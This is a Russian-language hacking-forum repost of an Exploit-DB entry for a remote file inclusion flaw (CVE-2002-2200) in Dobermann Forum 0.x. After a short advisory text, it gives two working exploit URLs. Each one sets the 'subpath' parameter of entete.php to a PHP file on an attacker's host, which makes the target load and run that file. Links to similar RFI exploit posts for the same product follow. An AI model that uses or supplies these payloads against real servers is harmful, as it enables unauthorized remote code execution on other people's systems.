Exploit Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21967
Проверка EDB
  1. Пройдено
Автор
FROG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2002-2200
Дата публикации
2002-10-28
Код: 
source: https://www.securityfocus.com/bid/6057/info

Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. 

http://[target]/entete.php?subpath=http://[attacker]/banniere.php

http://[target]/topic/entete.php?subpath=http://[attacker]/banniere.php
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion
Ответы
0
Просмотры
308
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion
Ответы
0
Просмотры
307
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion
Ответы
0
Просмотры
316
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу